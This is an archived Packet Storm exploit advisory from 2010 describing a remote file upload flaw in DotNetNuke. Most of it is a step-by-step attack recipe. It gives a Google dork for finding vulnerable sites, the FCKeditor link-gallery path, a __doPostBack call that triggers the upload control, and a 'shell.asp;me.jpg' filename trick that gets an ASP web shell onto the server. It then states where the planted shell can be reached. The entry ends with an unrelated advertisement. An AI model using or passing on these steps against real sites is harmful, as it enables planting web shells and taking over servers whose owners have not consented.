DotNetNuke Shell Upload

2010-05-22T00:00:00
ID PACKETSTORM:89837
Type packetstorm
Reporter Ma3sTr0-Dz
Modified 2010-05-22T00:00:00

Description

                                        
                                            `  
  
  
************************************************************  
** DotNetNuke Remote File upload Vulnerability   
************************************************************  
** Prodcut: DotNetNuke   
** Home : www.DZ4All.cOm/Cc  
** Vunlerability : Remote File upload  
** Risk : High  
** Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/  
************************************************************  
** Discovred by: Ra3cH & Ma3sTr0-Dz  
** From : Algeria  
** Contact : e51@hotmail.fr  
** *********************************************************  
** Greetz to : ALLAH   
** All Members of http://www.DZ4All.cOm/Cc  
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz  
************************************************************  
** Exploit:  
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx  
**  
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')  
**  
**   
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg   
************************************************************  
**  
** you find your Shell Hier   
**  
** http://[PATH]/portals/0/dz4all.asp;me.jpg  
***********************************************************   
_________________________________________________________________  
Vous voulez regarder la TV directement depuis votre PC ? C'est très simple avec Windows 7  
http://clk.atdmt.com/FRM/go/229960614/direct/01/  
  
  
`